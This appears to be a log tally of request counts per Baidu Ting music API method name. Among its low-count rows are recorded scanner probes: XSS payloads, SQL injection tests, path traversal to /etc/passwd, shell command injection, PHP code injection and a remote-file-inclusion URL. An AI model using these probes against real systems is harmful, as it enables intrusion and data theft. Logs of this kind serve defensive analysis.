baidu.ting.song.getInfos	67724082
baidu.ting.search.lrcpic	28515649
baidu.ting.song.baseInfo	26666183
baidu.ting.search.catalogSug	21108714
baidu.ting.user.listenAge	20811058
baidu.ting.outerPassport.profile	20606856
baidu.ting.song.play	19447968
baidu.ting.search.common	19060097
baidu.ting.song.down	10310911
baidu.ting.song.lry	9000209
baidu.ting.user.getUserBaseInfo	8345055
baidu.ting.artist.getSongList	6176649
baidu.ting.favorite.isCollect	5852146
baidu.ting.artist.getList	5711467
baidu.ting.billboard.billList	5226483
baidu.ting.song.getInfo	4982665
ting.baidu.diy.getPlaylists	4910240
baidu.ting.user.config	4589682
baidu.ting.search.lrcys	4351216
baidu.ting.search.getPhotoInfos	4265880
baidu.ting.game.gamedetail	3803735
baidu.ting.plaza.getRecommendAlbum	3528545
baidu.ting.user.checkComVersion	3186150
baidu.ting.active.start	3009022
baidu.ting.artist.getInfo	2973371
baidu.ting.plaza.active	2930994
baidu.ting.user.checkSuggestVersion	2555535
baidu.ting.radio.playAction	2548156
baidu.ting.diy.gedanInfo	2467320
baidu.ting.plaza.getFocusPic	2295684
	2238597
baidu.ting.user.getMessage	1985606
baidu.ting.diy.gedanHot	1906689
baidu.ting.search.suggestion	1562832
baidu.ting.artist.getinfo	1544213
baidu.ting.diy.category	1505582
baidu.ting.vip.checkVIPPromotion	1486274
ting.baidu.plaza.recdaily	1481014
baidu.ting.album.getAlbumInfo	1217175
baidu.ting.radio.getChannelSong	1164412
baidu.ting.user.registToUC	1121188
baidu.ting.diy.addListenCount	1119776
baidu.ting.plaza.getPartDesc	1043936
baidu.ting.favorite.getCollectSong	1042393
baidu.ting.feedback.song	993047
baidu.ting.plaza.recdaily	975871
baidu.ting.artist.getAlbumList	909490
baidu.ting.user.down	853069
baidu.ting.diy.gedan	713140
baidu.ting.tag.songlist	691650
baidu.ting.song.buffer	661832
baidu.ting.tag.getHotTag	649316
baidu.ting.diy.getNowOfficalList	588749
baidu.ting.song.audio	574119
baidu.ting.user.RegistToImsg	572990
baidu.ting.diy.getSongFromOfficalList	523370
baidu.ting.radio.getCategoryList	485574
baidu.ting.billboard.billCategory	442577
baidu.ting.search.lrcyss	407827
baidu.ting.diy.getPlaylists	321106
baidu.ting.search.getPhotoInfo	279651
baidu.ting.game.gamelist	273174
baidu.ting.artist.get72HotArtist	213623
baidu.ting.plaza.recommend	207311
baidu.ting.favorite.getFavoriteSong	181603
baidu.ting.song.getMulInfos	181211
baidu.ting.favorite.addSongFavorites	140770
baidu.ting.favorite.addSongFavorite	119301
baidu.ting.tag.getAllTag	109068
baidu.ting.diy.search	108466
baidu.ting.mv.getIndexMV	106512
baidu.ting.video.getList	96120
baidu.ting.diy.getSimilarGedan	90455
baidu.ting.video.play	85315
baidu.ting.diy.getOfficialDiyList	84566
baidu.ting.favorite.delCollectSong	49113
baidu.ting.plaza.getNewSongs	47940
baidu.ting.artist.getSpecialSongList	42004
baidu.ting.user.checkVersion	40073
ting.baidu.diy.getPlaylist	35620
baidu.ting.mv.playMV	34563
baidu.ting.radio.getArtistChannelSong	30508
baidu.ting.radio.getFavoriteSong	23277
baidu.ting.feedback.crash	20146
baidu.ting.plaza.getArtistPlaza	19455
baidu.ting.diy.getPlaylist	15395
baidu.ting.radio.serv	15388
baidu.ting.artist.getHighSongTitle	13599
baidu.ting.user.nplogin	12793
baidu.ting.album.getList	12485
baidu.ting.song.cloud	10312
baidu.ting.diy.saveList	9958
baidu.ting.favorite.delSongFavorite	9610
ting.baidu.film.getFilmInfo	9146
baidu.ting.mv.searchMV	9029
baidu.ting.diy.addListSong	8366
baidu.ting.video.category	8148
baidu.ting.song.getMulInfo	7761
ting.baidu.song.lry	6780
baidu.ting.artist.getQianQianArtist	6446
baidu.ting.cloud.checkFile	5420
baidu.ting.cloud.record	5085
baidu.ting.artist.getInfoList	4990
baidu.ting.diy.delListSong	4812
baidu.ting.weixin.response	4795
baidu.ting.diy.delList	4733
baidu.ting.billboard.catalog	4303
baidu.ting.user.logout	4096
baidu.ting.user.regPassport	4051
baidu.ting.artist.getHighSongList	3669
baidu.ting.colorRing.listen	3484
ting.baidu.search.lrcpic	2998
baidu.ting.user.getMobileVcode	2687
baidu.ting.colorRing.getCode	2618
baidu.ting.colorRing.authset	2617
ting.baidu.search.common	2475
ting.baidu.artistapp.renum	2270
baidu.ting.favorite.delSongFavorites	1967
baidu.ting.mv.getMultiSongMVInfo	1870
baidu.ting.diy.getRecommendSpeical	1729
baidu.ting.favorite.getFavoriteAlbum	1480
baidu.ting.song.getPic	1430
baidu.ting.vip.checkUserExchange	1357
ting.baidu.plaza.getRecommendAlbum	1158
baidu.ting.artist.getSongRank	1132
ting.baidu.billboard.billlist	1129
baidu.ting.artist.getSong	1128
baidu.ting.diy.addList	848
ting.baidu.artistapp.brief	824
baidu.ting.mv.getMVCategory	775
baidu.ting.favorite.getListenHistory	742
ting.baidu.diy.gedan	614
ting.baidu.song.cloud	602
ting.baidu.song.play	602
ting.baidu.billboard.billCategory	583
ting.baidu.diy.gedaninfo	581
ting.baidu.song.getinfos	580
baidu.ting.video.recMv	576
ting.baidu.song.down	575
ting.baidu.diy.gedanhot	569
ting.baidu.song.baseInfo	555
baidu.ting.feedback.info	533
baidu.ting.favorite.getOffenListenList	478
baidu.ting.diy.upList	477
baidu.ting.cloud.expand	415
baidu.ting.user.activate	332
baidu.ting.cloud.signature	314
ting.baidu.plaza.getFocusPic	290
baidu.ting.colorRing.toneset	266
baidu.ting.song.getSuoSongInfo	265
baidu.ting.colorRing.subscribe	253
baidu.ting.artist.getInfoByName	252
baidu.ting.artistapp.photo	170
baidu.ting.favorite.getInfoFromView	164
baidu.ting.user.login	153
ting.baidu.artistapp.newList	141
ting.baidu.artistapp.news	117
baidu.ting.vip.exchangeVIP	108
baidu.ting.hot.hotlist	98
baidu.ting.song.getHash	98
baidu.ting.favorite.addAlbumFavorite	91
baidu.ting.song.playAAC	51
ting.baidu.artistapp.briefs	50
[object Object]	41
baidu.ting.plaza.getMisNewSong	40
baidu.ting.user.addPassportInfo	31
baidu.ting.favorite.delAlbumFavorite	29
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	23
baidu.ting.album.getAlbumstyle	18
baidu.ting.game.catalog	15
ting.baidu.artistapp.send	14
(	9
\' (	8
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
ting.baidu.song.getInfos	5
ting.baidu.diy	5
data://text/plain;base64,dGVzdA==_	3
file:///etc/rc.d/rc.local	3
data://text/plain;base64,dGVzdA==	3
file:///etc/passwd_	3
c:/windows/win.ini_	3
1\\\";cat /etc/rc.d/rc.local;\\\"	3
1;cat /etc/rc.d/rc.local;	3
ting.baidu.user.checkComVersion	3
file:///etc/passwd	3
${@print(md5(812812))}	3
string:{var_dump(md5(812812))}	3
c:/windows/win.ini	3
${	3
\'];${@print(md5(812812))};//	3
/usr/bin/id;	3
../../../../../../../../../../etc/passwd_	3
http://cirt.lnet/rfiinc.txt_	3
../../../../../../../../../../etc/rc.d/rc.local_	3
../../../../../../../../../../etc/rc.d/rc.local	3
file:///etc/rc.d/rc.local_	3
baidu.ting.sea	3
http://cirt.lnet/rfiinc.txt	3
../../../../../../../../../../etc/passwd	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	3
set	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	3
baidu.ting.song.play\';alert(1);\'	2
http://10.42.7.217/?1388487587.11	2
baidu.ting.song.lry\';alert(1);\'	2
http://cirt.lnet/rfiinc.txt_.php	2
http://10.42.7.217/?1388487591.4	2
baidu.ting.song.play;alert(1);//	2
	2
baidu.ting.art	2
%{	2
ting.baidu.mv.getArtistMVInfo	2
1\';cat /etc/rc.d/rc.local;\'	2
file:///etc/passwd_.htm	2
baidu.ting.use	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
ting.baidu.game.gamedetail	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
../../../../../../../../../../etc/passwd_.htm	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
data://text/plain;base64,dGVzdA==_.php	2
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.song.getInformaormat=json	1
baidu.ting.search.lrcpic$format=json	1
baidu.ting.song.lry\'\";alert(1);//	1
ting.baidu.song.thirddown	1
baidu.ting.officialdiy.getGeDanInfo	1
ting.baidu.feedback.crash	1
baidu.ting.pla	1
ting.baidu.favorite.getCollectSong	1
baidu.ting.song.play\";alert(1);\"	1
baidu.ting.plaza.activ\";alert(1);	1
baidu.ting.fee	1
baidu.ting.ra	1
baidu.ting.song.lry\";alert(1);\"	1
ting.baidu.mv.getMultiSongMVInfo	1
baidu.ting.plaza.activ	1
http://cirt.lnet/rfiinc.txt_.htm	1
baidu.ting.fav	1
ting.baidu.mv.getindexmv	1
file:///etc/rc.d/rc.local_.jpeg	1
file:///etc/rc.d/rc.local_.html	1
file:///etc/passwd_.html	1
baidu.ting.song.lry;alert(1);//	1
file:///etc/rc.d/rc.local_.jpg	1
baidu.ting.artist.info	1
baidu.ting.diy	1
baidu.ting.pl	1
baidu.ting.artist.getalbumlist	1
ting.baidu.song.audio	1
baidu.ting.game.gameplay	1
baidu.ting.plaza	1
baidu.ting.artist.getsonglist	1
baidu.api.ting.baidu.com	1
baide.ting.song.getInfos	1
baidU.ting.feedback.sonf	1
baidu.ting.seargh.suggestion	1
ting.baidu.plaza.active	1
ting.baidu.game.catalog	1
ting.baidu.pla	1
baidu.ting.bil	1
c:/windows/win.ini_.php	1
c:/windows/win.ini_.jpg	1
baidu.ting.search.getPhotoInfLUJ4xgOlhY2tN64muery=å®_å_©é__åº_å_¸	1
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	1
ting.baidu.mv.playmv	1
baidu.ting.song.lry--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
baidu.ting.tag.songlis4	1
baidu.ting.son	1
baidu.ting.act	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.play</script><script>alert(1);//	1
ting.baidu.search.playback	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.song.lry</script><script>alert(1);//	1
baidu.ting.song.lry<script>confirm(1)</script>	1
../../../../../../../../../../etc/passwd_.jpeg	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
ting.baidu.plaza.recommend	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
baidu.ting.favorite.getFavoriteSongCount	1
data://text/plain;base64,dGVzdA==_.html	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.song.lryjavascript:alert(1)	1
